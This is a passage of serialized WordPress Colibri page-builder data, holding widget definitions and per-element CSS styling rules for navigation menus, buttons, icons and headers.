251)\"}},\"widget-button-icon\":{\"display\":\"inline-block\"},\"widget-button-text\":{\"display\":\"none\"},\"widget-input-placeholder\":{\"color\":\"${theme.colors.5|variant2}\"}}},\"v\":\"1.1\",\"nodes\":[\"438-s6\"],\"props\":{\"attrs\":{\"overflowOption\":\"visible\"}}},{\"id\":186,\"type\":\"hop-recent-post-widget\",\"nodeId\":\"1719-s4\",\"v\":\"1.1\",\"nodes\":[\"438-s7\"]},{\"id\":187,\"type\":\"hop-recent-comments-widget\",\"nodeId\":\"1719-s5\",\"v\":\"1.1\",\"nodes\":[\"438-s8\"]},{\"id\":188,\"type\":\"hop-archives-widget\",\"nodeId\":\"1719-s6\",\"v\":\"1.1\",\"props\":{\"frame\":{\"type\":\"border\"},\"enabledFrameOption\":false,\"showFrameOverImage\":false,\"showFrameShadow\":false},\"nodes\":[\"438-s9\"]},{\"id\":189,\"type\":\"hop-categories-widget\",\"nodeId\":\"1719-s7\",\"v\":\"1.1\",\"nodes\":[\"438-s10\"]},{\"id\":190,\"type\":\"hop-meta-widget\",\"nodeId\":\"1719-s8\",\"v\":\"1.1\",\"nodes\":[\"438-s11\"]},{\"id\":191,\"type\":\"hop-text-widget\",\"nodeId\":\"28-s16\",\"nodes\":[\"438-s12\"],\"v\":\"1.1\"}]\";s:7:\"cssById\";a:191:{i:1;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:2;a:3:{s:7:\"desktop\";s:369:\"#colibri .style-2 {\n animation-duration: 0.5s;\n padding-top: 20px;\n padding-right: 15px;\n padding-bottom: 20px;\n padding-left: 15px;\n}\n#colibri .h-navigation_sticky .style-2,#colibri .h-navigation_sticky.style-2 {\n background-color: #ffffff;\n background-image: none;\n padding-top: 10px;\n padding-bottom: 10px;\n box-shadow: 0px 0px 4px 0px rgba(0,0,0,0.5) ;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:189:\"#colibri .style-2 {\n padding-top: 0px;\n padding-bottom: 0px;\n}\n#colibri .h-navigation_sticky .style-2,#colibri .h-navigation_sticky.style-2 {\n padding-top: 0px;\n padding-bottom: 0px;\n}\n\";}i:3;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:4;a:3:{s:7:\"desktop\";s:81:\"#colibri .style-4 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:5;a:3:{s:7:\"desktop\";s:557:\"#colibri .style-5-image {\n max-height: 70px;\n}\n#colibri .style-5 a,#colibri .style-5 .logo-text {\n color: #ffffff;\n text-decoration: none;\n font-size: 24px;\n}\n#colibri .style-5 .logo-text {\n color: #FFFFFF;\n}\n#colibri .h-navigation_sticky .style-5-image,#colibri .h-navigation_sticky.style-5-image {\n max-height: 70px;\n}\n#colibri .h-navigation_sticky .style-5 a,#colibri .h-navigation_sticky .style-5 .logo-text,#colibri .h-navigation_sticky.style-5 a,#colibri .h-navigation_sticky.style-5 .logo-text {\n color: #000000;\n text-decoration: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:6;a:3:{s:7:\"desktop\";s:81:\"#colibri .style-6 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:7;a:3:{s:7:\"desktop\";s:38:\"#colibri .style-7 {\n height: 50px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:8;a:3:{s:7:\"desktop\";s:81:\"#colibri .style-8 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:9;a:3:{s:7:\"desktop\";s:8524:\"#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu {\n justify-content: flex-end;\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu > li {\n margin-top: 0px;\n margin-right: 20px;\n margin-bottom: 0px;\n margin-left: 20px;\n padding-top: 10px;\n padding-right: 0px;\n padding-bottom: 10px;\n padding-left: 0px;\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item,#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover {\n margin-top: 0px;\n margin-right: 20px;\n margin-bottom: 0px;\n margin-left: 20px;\n padding-top: 10px;\n padding-right: 0px;\n padding-bottom: 10px;\n padding-left: 0px;\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu > li > a {\n font-family: Open Sans;\n font-weight: 600;\n text-transform: uppercase;\n font-size: 14px;\n line-height: 1.5em;\n letter-spacing: 0px;\n color: #FFFFFF;\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu > li.hover > a {\n color: rgb(166, 220, 244);\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu > li.hover > a {\n color: rgb(166, 220, 244);\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n font-family: Open Sans;\n font-weight: 600;\n text-transform: uppercase;\n font-size: 14px;\n line-height: 1.5em;\n letter-spacing: 0px;\n color: rgb(166, 220, 244);\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul {\n background-color: #ffffff;\n background-image: none;\n margin-right: 5px;\n margin-left: 5px;\n box-shadow: 0px 0px 5px 2px rgba(0, 0, 0, 0.04) ;\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul li {\n padding-top: 10px;\n padding-right: 20px;\n padding-bottom: 10px;\n padding-left: 20px;\n border-top-width: 0px;\n border-top-style: none;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 1px;\n border-bottom-color: rgba(128,128,128,.2);\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-style: none;\n background-color: rgb(255, 255, 255);\n background-image: none;\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover {\n background-color: #03a9f4;\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul > li:hover,#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover {\n background-color: #03a9f4;\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item,#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover {\n padding-top: 10px;\n padding-right: 20px;\n padding-bottom: 10px;\n padding-left: 20px;\n border-top-width: 0px;\n border-top-style: none;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 1px;\n border-bottom-color: rgba(128,128,128,.2);\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-style: none;\n background-color: #03a9f4;\n background-image: none;\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul > li > a {\n font-size: 14px;\n color: rgb(102, 102, 102);\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover > a {\n color: rgb(255, 255, 255);\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul > li:hover > a,#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover > a {\n color: rgb(255, 255, 255);\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a,#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a:hover {\n font-size: 14px;\n color: rgb(255, 255, 255);\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .style-9 \n ul.colibri-menu.bordered-active-item > li::before {\n background-color: rgb(166, 220, 244);\n background-image: none;\n height: 3px;\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu.solid-active-item > li::after,#colibri .style-9 \n ul.colibri-menu.solid-active-item > li::before {\n background-color: white;\n background-image: none;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 0%;\n border-top-right-radius: 0%;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 0%;\n border-bottom-right-radius: 0%;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu > li > ul {\n margin-top: 0px;\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu > li > ul::before {\n height: 0px;\n width: 100% ;\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > a > svg,#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > a > .arrow-wrapper {\n padding-right: 5px;\n padding-left: 5px;\n color: black;\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > svg,#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > svg,#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > .arrow-wrapper,#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > .arrow-wrapper {\n padding-right: 5px;\n padding-left: 5px;\n color: black;\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul li > a > svg,#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul li > a > .arrow-wrapper {\n color: rgb(255, 255, 255);\n}\n#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > svg,#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > svg,#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > .arrow-wrapper,#colibri .style-9 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > .arrow-wrapper {\n color: rgb(255, 255, 255);\n}\n#colibri .h-navigation_sticky .style-9 > div > .colibri-menu-container > ul.colibri-menu > li > a,#colibri .h-navigation_sticky.style-9 > div > .colibri-menu-container > ul.colibri-menu > li > a {\n color: rgb(2, 110, 159);\n}\n#colibri .h-navigation_sticky .style-9 > div > .colibri-menu-container > ul.colibri-menu > li.hover > a,#colibri .h-navigation_sticky.style-9 > div > .colibri-menu-container > ul.colibri-menu > li.hover > a {\n color: #03a9f4;\n}\n#colibri .h-navigation_sticky .style-9 > div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .h-navigation_sticky .style-9 > div > .colibri-menu-container > ul.colibri-menu > li.hover > a,#colibri .h-navigation_sticky.style-9 > div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .h-navigation_sticky.style-9 > div > .colibri-menu-container > ul.colibri-menu > li.hover > a {\n color: #03a9f4;\n}\n#colibri .h-navigation_sticky .style-9 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .h-navigation_sticky .style-9 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover,#colibri .h-navigation_sticky.style-9 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .h-navigation_sticky.style-9 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n color: #03a9f4;\n}\n#colibri .h-navigation_sticky .style-9 > div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .h-navigation_sticky .style-9 \n ul.colibri-menu.bordered-active-item > li::before,#colibri .h-navigation_sticky.style-9 > div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .h-navigation_sticky.style-9 \n ul.colibri-menu.bordered-active-item > li::before {\n background-color: #03a9f4;\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:10;a:3:{s:7:\"desktop\";s:928:\"#colibri .style-10-offscreen {\n background-color: #222B34;\n background-image: none;\n width: 300px !important;\n}\n#colibri .style-10-offscreenOverlay {\n background-color: rgba(0,0,0,0.5);\n background-image: none;\n}\n#colibri .style-10 .h-hamburger-icon {\n background-color: rgba(0, 0, 0, 0.1);\n background-image: none;\n border-top-width: 0px;\n border-top-color: black;\n border-top-style: solid;\n border-top-left-radius: 100%;\n border-top-right-radius: 100%;\n border-right-width: 0px;\n border-right-color: black;\n border-right-style: solid;\n border-bottom-width: 0px;\n border-bottom-color: black;\n border-bottom-style: solid;\n border-bottom-left-radius: 100%;\n border-bottom-right-radius: 100%;\n border-left-width: 0px;\n border-left-color: black;\n border-left-style: solid;\n fill: white;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n width: 24px;\n height: 24px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:11;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:12;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:13;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-13 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:14;a:3:{s:7:\"desktop\";s:496:\"#colibri .style-14-image {\n max-height: 70px;\n}\n#colibri .style-14 a,#colibri .style-14 .logo-text {\n color: #ffffff;\n text-decoration: none;\n}\n#colibri .h-navigation_sticky .style-14-image,#colibri .h-navigation_sticky.style-14-image {\n max-height: 70px;\n}\n#colibri .h-navigation_sticky .style-14 a,#colibri .h-navigation_sticky .style-14 .logo-text,#colibri .h-navigation_sticky.style-14 a,#colibri .h-navigation_sticky.style-14 .logo-text {\n color: #000000;\n text-decoration: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:15;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:16;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-16 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:17;a:3:{s:7:\"desktop\";s:3929:\"#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu > li > a {\n padding-top: 12px;\n padding-bottom: 12px;\n padding-left: 40px;\n border-top-width: 0px;\n border-top-color: #808080;\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: #808080;\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: #808080;\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: #808080;\n border-left-style: solid;\n font-size: 14px;\n color: white;\n}\n#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n padding-top: 12px;\n padding-bottom: 12px;\n padding-left: 40px;\n border-top-width: 0px;\n border-top-color: #808080;\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: #808080;\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: #808080;\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: #808080;\n border-left-style: solid;\n font-size: 14px;\n color: white;\n}\n#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu li > ul > li > a {\n padding-top: 12px;\n padding-bottom: 12px;\n padding-left: 40px;\n border-top-width: 0px;\n border-top-color: #808080;\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: #808080;\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: #808080;\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: #808080;\n border-left-style: solid;\n font-size: 14px;\n color: white;\n}\n#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a,#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a:hover {\n padding-top: 12px;\n padding-bottom: 12px;\n padding-left: 40px;\n border-top-width: 0px;\n border-top-color: #808080;\n border-top-style: solid;\n border-right-width: 0px;\n border-right-color: #808080;\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: #808080;\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-color: #808080;\n border-left-style: solid;\n font-size: 14px;\n color: white;\n}\n#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu li > a > svg,#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu li > a > .arrow-wrapper {\n padding-right: 20px;\n padding-left: 20px;\n color: black;\n}\n#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > svg,#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > svg,#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > .arrow-wrapper,#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > .arrow-wrapper {\n padding-right: 20px;\n padding-left: 20px;\n color: black;\n}\n#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu li > ul li > a > svg,#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu li > ul li > a > .arrow-wrapper {\n color: white;\n padding-right: 20px;\n padding-left: 20px;\n}\n#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > svg,#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > svg,#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > .arrow-wrapper,#colibri .style-17 > div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > .arrow-wrapper {\n color: white;\n padding-right: 20px;\n padding-left: 20px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:18;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:19;a:3:{s:7:\"desktop\";s:164:\"#colibri .style-19 {\n background-color: black;\n background-image: none;\n padding-top: 5px;\n padding-right: 15px;\n padding-bottom: 5px;\n padding-left: 15px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:20;a:3:{s:7:\"desktop\";s:80:\"#colibri .style-20 {\n text-align: left;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:21;a:3:{s:7:\"desktop\";s:1279:\"#colibri .style-21-icon {\n fill: #FFFFFF;\n width: 18px ;\n height: 18px;\n padding-left: 0px;\n border-top-width: 2px;\n border-top-color: #03a9f4;\n border-top-style: none;\n border-right-width: 2px;\n border-right-color: #03a9f4;\n border-right-style: none;\n border-bottom-width: 2px;\n border-bottom-color: #03a9f4;\n border-bottom-style: none;\n border-left-width: 2px;\n border-left-color: #03a9f4;\n border-left-style: none;\n}\n#colibri .style-21-icon:hover {\n background-color: rgba(3, 169, 244, 0);\n background-image: none;\n}\n#colibri .style-21 .list-item-text-wrapper {\n horizontal-align: start;\n padding-right: 0px;\n padding-bottom: 0px;\n}\n#colibri .style-21 .list-text {\n margin-left: 5px;\n color: #FFFFFF;\n font-size: 14px;\n}\n#colibri .style-21 .list-divider {\n color: rgb(0,0,0);\n width: 100% ;\n height: 100%;\n border-top-width: 0px;\n border-top-style: solid;\n border-right-width: 0px;\n border-right-style: solid;\n border-bottom-width: 0px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: solid;\n border-left-width: 1px;\n border-left-style: solid;\n margin-left: 0px;\n}\n#colibri .style-21 .list-container-divider {\n width: 1px ;\n padding-top: 0px;\n padding-right: 10px;\n padding-bottom: 0px;\n padding-left: 10px;\n height: 100%;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:22;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-22 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:23;a:3:{s:7:\"desktop\";s:376:\"#colibri .style-23 .social-icon-container {\n margin-right: 0px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n#colibri .style-23 .icon-container {\n fill: rgb(204, 204, 204);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-23 .icon-container:hover {\n fill: #FFFFFF;\n}\n#colibri .style-23 .icon-container:hover {\n fill: #FFFFFF;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:24;a:3:{s:7:\"desktop\";s:739:\"#colibri .style-24 {\n height: auto;\n min-height: unset;\n color: #FFFFFF;\n background-position: center center;\n background-size: cover;\n background-image: url(\"https://gsudice.dataconn.net/wp-content/plugins/colibri-page-builder/extend-builder/assets/partials-images/images-xheader-default-0-1545411152082.jpg\");\n background-attachment: scroll;\n background-repeat: no-repeat;\n padding-top: 150px;\n padding-bottom: 150px;\n}\n#colibri .style-24 h1 {\n color: #FFFFFF;\n}\n#colibri .style-24 h2 {\n color: #FFFFFF;\n}\n#colibri .style-24 h3 {\n color: #FFFFFF;\n}\n#colibri .style-24 h4 {\n color: #FFFFFF;\n}\n#colibri .style-24 h5 {\n color: #FFFFFF;\n}\n#colibri .style-24 h6 {\n color: #FFFFFF;\n}\n#colibri .style-24 p {\n color: #FFFFFF;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:25;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:26;a:3:{s:7:\"desktop\";s:302:\"#colibri .style-26 {\n text-align: center;\n height: auto;\n min-height: unset;\n border-top-width: 0px;\n border-top-style: solid;\n border-right-width: 0px;\n border-right-style: solid;\n border-bottom-width: 0px;\n border-bottom-style: solid;\n border-left-width: 0px;\n border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:27;a:3:{s:7:\"desktop\";s:330:\"#colibri .style-27 p,#colibri .style-27 h1,#colibri .style-27 h2,#colibri .style-27 h3,#colibri .style-27 h4,#colibri .style-27 h5,#colibri .style-27 h6 {\n font-weight: 600;\n}\n#colibri .style-27 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:28;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:29;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:30;a:3:{s:7:\"desktop\";s:1290:\"#colibri .style-30-icon {\n width: 14px;\n height: 14px;\n margin-right: 10px;\n margin-left: 0px;\n}\n#colibri .style-30 {\n background-color: #03a9f4;\n background-image: none;\n font-family: Open Sans;\n font-weight: 600;\n text-transform: uppercase;\n font-size: 14px;\n line-height: 1em;\n letter-spacing: 1px;\n color: white;\n border-top-width: 2px;\n border-top-color: #03a9f4;\n border-top-style: solid;\n border-top-left-radius: 56px;\n border-top-right-radius: 56px;\n border-right-width: 2px;\n border-right-color: #03a9f4;\n border-right-style: solid;\n border-bottom-width: 2px;\n border-bottom-color: #03a9f4;\n border-bottom-style: solid;\n border-bottom-left-radius: 56px;\n border-bottom-right-radius: 56px;\n border-left-width: 2px;\n border-left-color: #03a9f4;\n border-left-style: solid;\n padding-top: 15px;\n padding-right: 30px;\n padding-bottom: 15px;\n padding-left: 30px;\n text-align: center;\n}\n#colibri .style-30:hover,#colibri .style-30:focus {\n background-color: rgb(2, 110, 159);\n border-top-color: rgb(2, 110, 159);\n border-right-color: rgb(2, 110, 159);\n border-bottom-color: rgb(2, 110, 159);\n border-left-color: rgb(2, 110, 159);\n}\n#colibri .style-30:active .style-30-icon {\n width: 14px;\n height: 14px;\n margin-right: 10px;\n margin-left: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:31;a:3:{s:7:\"desktop\";s:1259:\"#colibri .style-31-icon {\n width: 14px;\n height: 14px;\n margin-right: 10px;\n margin-left: 0px;\n}\n#colibri .style-31 {\n background-color: transparent;\n background-image: none;\n font-family: Open Sans;\n font-weight: 600;\n text-transform: uppercase;\n font-size: 14px;\n line-height: 1em;\n letter-spacing: 1px;\n color: white;\n border-top-width: 2px;\n border-top-color: white;\n border-top-style: solid;\n border-top-left-radius: 56px;\n border-top-right-radius: 56px;\n border-right-width: 2px;\n border-right-color: white;\n border-right-style: solid;\n border-bottom-width: 2px;\n border-bottom-color: white;\n border-bottom-style: solid;\n border-bottom-left-radius: 56px;\n border-bottom-right-radius: 56px;\n border-left-width: 2px;\n border-left-color: white;\n border-left-style: solid;\n padding-top: 15px;\n padding-right: 30px;\n padding-bottom: 15px;\n padding-left: 30px;\n text-align: center;\n}\n#colibri .style-31:hover,#colibri .style-31:focus {\n background-color: rgba(255, 255, 255, 0.25);\n border-top-color: #FFFFFF;\n border-right-color: #FFFFFF;\n border-bottom-color: #FFFFFF;\n border-left-color: #FFFFFF;\n}\n#colibri .style-31:active .style-31-icon {\n width: 14px;\n height: 14px;\n margin-right: 10px;\n margin-left: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:32;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-32 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:33;a:3:{s:7:\"desktop\";s:730:\"#colibri .style-33-image {\n opacity: 1;\n}\n#colibri .style-33-overlay {\n background-color: unset;\n background-image: none;\n}\n#colibri .style-33-caption {\n margin-top: 10px;\n}\n#colibri .style-33-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:34;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:35;a:3:{s:7:\"desktop\";s:372:\"#colibri .style-35 {\n animation-duration: 0.5s;\n padding-top: 20px;\n padding-right: 15px;\n padding-bottom: 20px;\n padding-left: 15px;\n}\n#colibri .h-navigation_sticky .style-35,#colibri .h-navigation_sticky.style-35 {\n background-color: #ffffff;\n background-image: none;\n padding-top: 10px;\n padding-bottom: 10px;\n box-shadow: 0px 0px 4px 0px rgba(0,0,0,0.5) ;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:192:\"#colibri .style-35 {\n padding-top: 0px;\n padding-bottom: 0px;\n}\n#colibri .h-navigation_sticky .style-35,#colibri .h-navigation_sticky.style-35 {\n padding-top: 0px;\n padding-bottom: 0px;\n}\n\";}i:36;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:37;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-37 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:38;a:3:{s:7:\"desktop\";s:567:\"#colibri .style-38-image {\n max-height: 70px;\n}\n#colibri .style-38 a,#colibri .style-38 .logo-text {\n color: #ffffff;\n text-decoration: none;\n font-size: 24px;\n}\n#colibri .style-38 .logo-text {\n color: #FFFFFF;\n}\n#colibri .h-navigation_sticky .style-38-image,#colibri .h-navigation_sticky.style-38-image {\n max-height: 70px;\n}\n#colibri .h-navigation_sticky .style-38 a,#colibri .h-navigation_sticky .style-38 .logo-text,#colibri .h-navigation_sticky.style-38 a,#colibri .h-navigation_sticky.style-38 .logo-text {\n color: #000000;\n text-decoration: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:39;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-39 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:40;a:3:{s:7:\"desktop\";s:39:\"#colibri .style-40 {\n height: 50px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:41;a:3:{s:7:\"desktop\";s:82:\"#colibri .style-41 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:42;a:3:{s:7:\"desktop\";s:8581:\"#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu {\n justify-content: flex-end;\n}\n#colibri .style-42 > div > .colibri-menu-container > ul.colibri-menu > li {\n margin-top: 0px;\n margin-right: 20px;\n margin-bottom: 0px;\n margin-left: 20px;\n padding-top: 10px;\n padding-right: 0px;\n padding-bottom: 10px;\n padding-left: 